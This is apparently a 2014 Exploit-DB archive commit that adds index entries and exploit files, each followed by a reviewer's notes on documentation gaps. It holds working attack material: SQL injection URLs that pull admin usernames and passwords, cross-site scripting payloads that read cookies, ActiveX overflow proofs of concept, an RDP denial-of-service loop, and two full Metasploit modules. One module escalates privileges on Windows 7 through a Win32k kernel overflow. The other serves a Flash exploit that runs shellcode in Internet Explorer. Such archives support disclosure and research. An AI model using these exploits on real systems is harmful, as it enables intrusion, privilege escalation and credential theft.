Updated 05_08_2014

Offensive Security 2014-05-08 04:36:22 +00:00
parent 0808f90f6a
commit 12a6febe09
14 changed files with 2615 additions and 0 deletions


@ -29940,3 +29940,16 @@ id,file,description,date,author,platform,type,port
33209,platforms/jsp/webapps/33209.txt,"Adobe RoboHelp Server 8 Authentication Bypass Vulnerability",2009-09-03,Intevydis,jsp,webapps,0
33210,platforms/multiple/remote/33210.txt,"HP Operations Manager Default Manager 8.1 Account Remote Security Vulnerability",2009-09-03,Intevydis,multiple,remote,0
33211,platforms/multiple/remote/33211.txt,"HP Operations Dashboard 2.1 Portal Default Manager Account Remote Security Vulnerability",2009-09-03,Intevydis,multiple,remote,0
33212,platforms/windows/remote/33212.rb,"Adobe Flash Player Integer Underflow Remote Code Execution",2014-05-06,metasploit,windows,remote,0
33213,platforms/windows/local/33213.rb,"Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)",2014-05-06,metasploit,windows,local,0
33214,platforms/php/webapps/33214.txt,"DvBBS 2.0 'boardrule.php' SQL Injection Vulnerability",2009-09-04,Securitylab.ir,php,webapps,0
33215,platforms/multiple/remote/33215.txt,"IBM Tivoli Identity Manager 5.0.5 User Profile HTML Injection Vulnerability",2009-08-26,IBM,multiple,remote,0
33216,platforms/hardware/dos/33216.txt,"Check Point Endpoint Security Full Disk Encryption RDP Connection Denial of Service Vulnerability",2009-09-09,"Tim Medin",hardware,dos,0
33217,platforms/php/webapps/33217.txt,"Joomla! 'com_pressrelease' Component 'id' Parameter SQL Injection Vulnerability",2009-09-10,Moudi,php,webapps,0
33218,platforms/php/webapps/33218.txt,"Joomla! 'com_mediaalert' Component 'id' Parameter SQL Injection Vulnerability",2009-09-11,Moudi,php,webapps,0
33219,platforms/php/webapps/33219.txt,"Planet 2.0 HTML Injection Vulnerability",2009-09-11,"Steve Kemp",php,webapps,0
33220,platforms/windows/dos/33220.txt,"FileCOPA FTP Server 5.01 'NOOP' Command Denial Of Service Vulnerability",2009-09-15,"Asheesh kumar Mani Tripathi",windows,dos,0
33221,platforms/windows/dos/33221.html,"Novell GroupWise Client 7.0.3.1294 'gxmim1.dll' ActiveX Control Buffer Overflow Vulnerability",2009-09-15,"Francis Provencher",windows,dos,0
33225,platforms/windows/dos/33225.html,"EasyMail Objects 6.0.2.0 'emimap4.dll' ActiveX Control Remote Code Execution Vulnerability",2009-09-15,"Francis Provencher",windows,dos,0
33226,platforms/php/webapps/33226.txt,"Mega File Hosting Script 1.2 'emaillinks.php' Cross Site Scripting Vulnerability",2009-09-16,Moudi,php,webapps,0
33227,platforms/php/webapps/33227.txt,"TuttoPHP Morris Guestbook 'view.php' Cross Site Scripting Vulnerability",2009-09-16,Moudi,php,webapps,0
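Review bot: the platform column for 33216 is "hardware", but the entry itself describes Check Point Endpoint Security Full Disk Encryption for Microsoft Windows, a software product; the other Windows desktop targets in this same hunk (33220, 33221, 33225) are filed under "windows", and users filter this CSV by platform, so "windows" would be the consistent choice. The 33215 title also carries version 5.0.5 while the entry body says 5.0.0.5; pick the one matching the BID so the two records agree.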

Can't render this file because it is too large.


@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/36315/info
Check Point Software Endpoint Security Full Disk Encryption for Microsoft Windows is prone to a remote denial-of-service vulnerability.
Exploiting this issue will allow attackers to crash the affected computer, denying service to legitimate users.
NOTE: This BID was originally titled 'Microsoft Windows RDP Connection Denial of Service Vulnerability' based on preliminary reports. It has been updated to properly reflect the underlying issue.
The following example is available:
for /L %i in (1,1,20) do mstsc /v:127.0.0.%i
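Review bot: the entry states no affected version and does not say on which host the failure occurs (the machine running the mstsc loop, or the RDP target with the FDE client installed) or which component fails, so the record cannot be matched against an asset inventory; add the affected version range from the BID and one sentence describing the observed failure. As written, the loop only targets loopback addresses 127.0.0.1 through 127.0.0.20, which is worth saying explicitly so the test conditions are clear.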


@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/36293/info
IBM Tivoli Identity Manager is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
IBM Tivoli Identity Manager 5.0.0.5 is vulnerable; other versions may also be affected.
The following example input was provided:
<script>alert("bbbbb")</script>
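Review bot: the affected version is inconsistent between this entry (5.0.0.5) and its files.csv title (5.0.5); align both with the BID. The entry also names no injection point, i.e. which user-profile field accepts the input, so the sample string cannot be tied to a specific form or request; add a sentence naming the field.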


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/36282/info
DvBBS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
DvBBS 2.0 is vulnerable; other versions may also be affected.
http://www.example.com/[Path]/boardrule.php?groupboardid=1/**/union/**/select/**/concat(0xBAF3CCA8D3C3BBA7C3FBA3BA,username,0x202020C3DCC2EBA3BA,password)/**/from%20dv_admin%20where%20id%20between%201%20and%204/**/
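Review bot: the description never names the injected parameter, which in the PoC URL is groupboardid rather than anything implied by the "boardrule.php" title; state it so a code fix or WAF rule targets the right input. The 0x... hex literals passed to concat() are opaque as written and should be documented as plain string markers, since readers building detection should not key on them.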


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/36351/info
The 'com_pressrelease' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?option=com_pressrelease&id=null+union+select+1,2,version%28%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
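Review bot: neither this entry nor its files.csv title gives an affected version of com_pressrelease, so the record cannot be matched against an installed component; add the version range from the BID. The 24-column union in the PoC is tied to one particular schema and should be described as such rather than left to be read as a general property of the component.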


@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/36356/info
The 'com_mediaalert' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?option=com_mediaalert&id=null+union+select+1,2,version%28%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
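Review bot: same gap as 33217: no affected version for com_mediaalert in the entry or the CSV title, and the only version hint is the BID link; add the range so the entry is actionable for anyone checking a Joomla! install.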

platforms/php/webapps/33219.txt (11 lines, executable file)

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/36392/info
Planet is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML and script code would run in the context of the affected website, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user.
Planet 2.0 is affected; other versions may also be vulnerable.
The following example code is available:
<img src="javascript:alert(1);" >
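Review bot: the test string depends on a javascript: URL inside an img src, which older browsers (Internet Explorer 6 era) executed but current browsers refuse, so the entry should state which browser the author verified it in; the underlying defect the description claims (unsanitized input reaching generated HTML) stands regardless of whether this particular string fires, and that distinction belongs in the text.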


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/36413/info
Mega File Hosting Script is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Mega File Hosting Script 1.2 is vulnerable; other versions may also be affected.
http://www.example.com/emaillinks.php?moudi=1"><script>alert(document.cookie);</script>
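Review bot: the query parameter in the PoC is "moudi", which is the submitter's handle rather than a documented parameter of emaillinks.php; the entry should say whether the script reflects any arbitrary query-string name or which real parameter is affected, because a code fix or filter rule written against "moudi" would miss the actual input.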


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/36415/info
Morris Guestbook is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/view.php?pagina=1"><script>alert(document.cookie);</script>
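Review bot: no affected version is given in the entry or in the files.csv title, and the description does not name the "pagina" parameter that the PoC targets; add both so the record can be acted on.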

platforms/windows/dos/33220.txt (2221 lines, executable file)

File diff suppressed because it is too large.


@ -0,0 +1,27 @@
source: http://www.securityfocus.com/bid/36398/info
Novell GroupWise Client is prone to an unspecified buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.
Successful exploits allow remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts will likely result in denial-of-service conditions.
Novell GroupWise Client 7.0.3.1294 is vulnerable; other versions may also be affected.
<html>
<object classid='clsid:9796BED2-C1CF-11D2-9384-0008C7396667' id='GWComposeCtl'>
</object>
<script language='vbscript'>
argCount = 1
arg1="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAA"
GWComposeCtl.SetFontFace arg1
</script>
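Review bot: the arg1 string literal is broken across two lines (the continuation line begins with 'AAAAAAAAAAAAAAAAAA"') with no VBScript line-continuation, so the script as pasted is a syntax error; if this is wrapping of one long line, rejoin it, otherwise split it as `arg1 = "..." & _` followed by the remainder. The description calls the overflow "unspecified" although the PoC identifies the SetFontFace method of the control with CLSID 9796BED2-C1CF-11D2-9384-0008C7396667; naming both in the text helps anyone writing a kill-bit or CLSID block rule.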


@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/36409/info
EasyMail Objects ActiveX control is prone to a remote code-execution vulnerability because the application fails to properly sanitize user-supplied data.
Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application (typically Internet Explorer) using the ActiveX control. Failed exploit attempts likely result in denial-of-service conditions.
EasyMail Objects 6.0.2.0 is vulnerable; other versions may also be affected.
Spam Inspector 4.0.354 is vulnerable.
<HTML> <object classid='clsid:0CEA3FB1-7F88-4803-AA8E-AD021566955D' id='target'></object> <script language = 'vbscript'> Scrap = unescape("http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA") code = Scrap target.LicenseKey = code </script> <html>
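Review bot: the document ends with `<html>` where `</html>` is intended, and the whole file sits on one line, which makes the VBScript hard to read; put each statement on its own line. `unescape("http://AAAA...")` has nothing to decode and is a no-op, so Scrap could be assigned the literal directly. The description should also name what the PoC exercises, the LicenseKey property of the control with CLSID 0CEA3FB1-7F88-4803-AA8E-AD021566955D, since that is what a kill-bit or block rule needs.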

platforms/windows/local/33213.rb (139 lines, executable file)

@ -0,0 +1,139 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/post/windows/reflective_dll_injection'
require 'rex'
class Metasploit3 < Msf::Exploit::Local
Rank = GreatRanking
include Msf::Post::File
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Process
include Msf::Post::Windows::FileInfo
include Msf::Post::Windows::ReflectiveDLLInjection
def initialize(info={})
super(update_info(info, {
'Name' => 'Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)',
'Description' => %q{
A kernel pool overflow in Win32k which allows local privilege escalation.
The kernel shellcode nulls the ACL for the winlogon.exe process (a SYSTEM process).
This allows any unprivileged process to freely migrate to winlogon.exe, achieving
privilege escalation. Used in pwn2own 2013 by MWR to break out of chrome's sandbox.
NOTE: when you exit the meterpreter session, winlogon.exe is likely to crash.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Nils', #Original Exploit
'Jon', #Original Exploit
'Donato Capitella <donato.capitella[at]mwrinfosecurity.com>', # Metasploit Conversion
'Ben Campbell <ben.campbell[at]mwrinfosecurity.com>' # Help and Encouragement ;)
],
'Arch' => ARCH_X86,
'Platform' => 'win',
'SessionTypes' => [ 'meterpreter' ],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Targets' =>
[
[ 'Windows 7 SP0/SP1', { } ]
],
'Payload' =>
{
'Space' => 4096,
'DisableNops' => true
},
'References' =>
[
[ 'CVE', '2013-1300' ],
[ 'MSB', 'MS13-053' ],
[ 'URL', 'https://labs.mwrinfosecurity.com/blog/2013/09/06/mwr-labs-pwn2own-2013-write-up---kernel-exploit/' ]
],
'DisclosureDate' => 'Dec 01 2013',
'DefaultTarget' => 0
}))
end
def check
os = sysinfo["OS"]
unless (os =~ /windows/i)
return Exploit::CheckCode::Unknown
end
file_path = expand_path("%windir%") << "\\system32\\win32k.sys"
major, minor, build, revision, branch = file_version(file_path)
vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")
case build
when 7600
return Exploit::CheckCode::Vulnerable
when 7601
if branch == 18
return Exploit::CheckCode::Vulnerable if revision < 18176
else
return Exploit::CheckCode::Vulnerable if revision < 22348
end
end
return Exploit::CheckCode::Unknown
end
def exploit
if is_system?
fail_with(Exploit::Failure::None, 'Session is already elevated')
end
if sysinfo["Architecture"] =~ /wow64/i
fail_with(Failure::NoTarget, "Running against WOW64 is not supported")
elsif sysinfo["Architecture"] =~ /x64/
fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported")
end
unless check == Exploit::CheckCode::Vulnerable
fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system")
end
print_status("Launching notepad to host the exploit...")
notepad_process_pid = cmd_exec_get_pid("notepad.exe")
begin
process = client.sys.process.open(notepad_process_pid, PROCESS_ALL_ACCESS)
print_good("Process #{process.pid} launched.")
rescue Rex::Post::Meterpreter::RequestError
print_status("Operation failed. Hosting exploit in the current process...")
process = client.sys.process.open
end
print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
library_path = ::File.join(Msf::Config.data_directory, "exploits", "cve-2013-1300", "schlamperei.x86.dll")
library_path = ::File.expand_path(library_path)
print_status("Injecting exploit into #{process.pid}...")
exploit_mem, offset = inject_dll_into_process(process, library_path)
thread = process.thread.create(exploit_mem + offset)
client.railgun.kernel32.WaitForSingleObject(thread.handle, 5000)
client.sys.process.each_process do |p|
if p['name'] == "winlogon.exe"
winlogon_pid = p['pid']
print_status("Found winlogon.exe with PID #{winlogon_pid}")
if execute_shellcode(payload.encoded, nil, winlogon_pid)
print_good("Everything seems to have worked, cross your fingers and wait for a SYSTEM shell")
else
print_error("Failed to start payload thread")
end
break
end
end
end
end
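Review bot: the header comment's download URL is malformed ("http//metasploit.com/download", missing the colon after the scheme); the same typo appears in 33212.rb. The patch thresholds encoded in check (win32k.sys build 7600 at any revision; build 7601 with revision below 18176 on branch 18, or below 22348 otherwise) are the useful MS13-053 patch-state indicators and deserve a sentence in the description next to the MS13-053 reference, so a reader can verify exposure from a file version without running the module. The description's warning that winlogon.exe is likely to crash on session exit is an availability impact that should stay prominent for anyone using this on a production host during an engagement.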

platforms/windows/remote/33212.rb (132 lines, executable file)

@ -0,0 +1,132 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::BrowserExploitServer
def initialize(info={})
super(update_info(info,
'Name' => "Adobe Flash Player Integer Underflow Remote Code Execution",
'Description' => %q{
This module exploits a vulnerability found in the ActiveX component of Adobe Flash Player
before 12.0.0.43. By supplying a specially crafted swf file it is possible to trigger an
integer underflow in several avm2 instructions, which can be turned into remote code
execution under the context of the user, as exploited in the wild in February 2014. This
module has been tested successfully with Adobe Flash Player 11.7.700.202 on Windows XP
SP3, Windows 7 SP1 and Adobe Flash Player 11.3.372.94 on Windows 8 even when it includes
rop chains for several Flash 11 versions, as exploited in the wild.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Unknown', # vulnerability discovery and exploit in the wild
'juan vazquez' # msf module
],
'References' =>
[
[ 'CVE', '2014-0497' ],
[ 'OSVDB', '102849' ],
[ 'BID', '65327' ],
[ 'URL', 'http://helpx.adobe.com/security/products/flash-player/apsb14-04.html' ],
[ 'URL', 'http://blogs.technet.com/b/mmpc/archive/2014/02/17/a-journey-to-cve-2014-0497-exploit.aspx' ],
[ 'URL', 'http://blog.vulnhunt.com/index.php/2014/02/20/cve-2014-0497_analysis/' ]
],
'Payload' =>
{
'Space' => 1024,
'DisableNops' => true
},
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f',
'Retries' => false
},
'Platform' => 'win',
# Versions targeted in the wild:
# [*] Windows 8:
# 11,3,372,94, 11,3,375,10, 11,3,376,12, 11,3,377,15, 11,3,378,5, 11,3,379,14
# 11,6,602,167, 11,6,602,171 ,11,6,602,180
# 11,7,700,169, 11,7,700,202, 11,7,700,224
# [*] Before windows 8:
# 11,0,1,152,
# 11,1,102,55, 11,1,102,62, 11,1,102,63
# 11,2,202,228, 11,2,202,233, 11,2,202,235
# 11,3,300,257, 11,3,300,273
# 11,4,402,278
# 11,5,502,110, 11,5,502,135, 11,5,502,146, 11,5,502,149
# 11,6,602,168, 11,6,602,171, 11,6,602,180
# 11,7,700,169, 11,7,700,202
# 11,8,800,97, 11,8,800,50
'BrowserRequirements' =>
{
:source => /script|headers/i,
:clsid => "{D27CDB6E-AE6D-11cf-96B8-444553540000}",
:method => "LoadMovie",
:os_name => Msf::OperatingSystems::WINDOWS,
:ua_name => Msf::HttpClients::IE,
:flash => lambda { |ver| ver =~ /^11\./ }
},
'Targets' =>
[
[ 'Automatic', {} ]
],
'Privileged' => false,
'DisclosureDate' => "Feb 5 2014",
'DefaultTarget' => 0))
end
def exploit
@swf = create_swf
super
end
def on_request_exploit(cli, request, target_info)
print_status("Request: #{request.uri}")
if request.uri =~ /\.swf$/
print_status("Sending SWF...")
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'})
return
end
print_status("Sending HTML...")
tag = retrieve_tag(cli, request)
profile = get_profile(tag)
profile[:tried] = false unless profile.nil? # to allow request the swf
send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
end
def exploit_template(cli, target_info)
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
shellcode = get_payload(cli, target_info).unpack("H*")[0]
html_template = %Q|<html>
<body>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
<param name="movie" value="<%=swf_random%>" />
<param name="allowScriptAccess" value="always" />
<param name="FlashVars" value="id=<%=shellcode%>" />
<param name="Play" value="true" />
</object>
</body>
</html>
|
return html_template, binding()
end
def create_swf
path = ::File.join( Msf::Config.data_directory, "exploits", "CVE-2014-0497", "Vickers.swf" )
swf = ::File.open(path, 'rb') { |f| swf = f.read }
swf
end
end
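Review bot: in exploit_template the object tag is written self-closing (`... width="1" height="1" />`) and then also closed with `</object>`, which is contradictory markup; drop the trailing slash. In create_swf, `swf = ::File.open(path, 'rb') { |f| swf = f.read }` assigns swf inside the block and again from the block's return value; `::File.binread(path)` does the same in one call. The header comment also carries the malformed "http//metasploit.com/download" URL. On the documentation side, the BrowserRequirements block (IE with the Flash CLSID D27CDB6E-AE6D-11cf-96B8-444553540000 and any 11.x version) is the clearest statement of the exposed population and could be echoed in the description alongside "before 12.0.0.43".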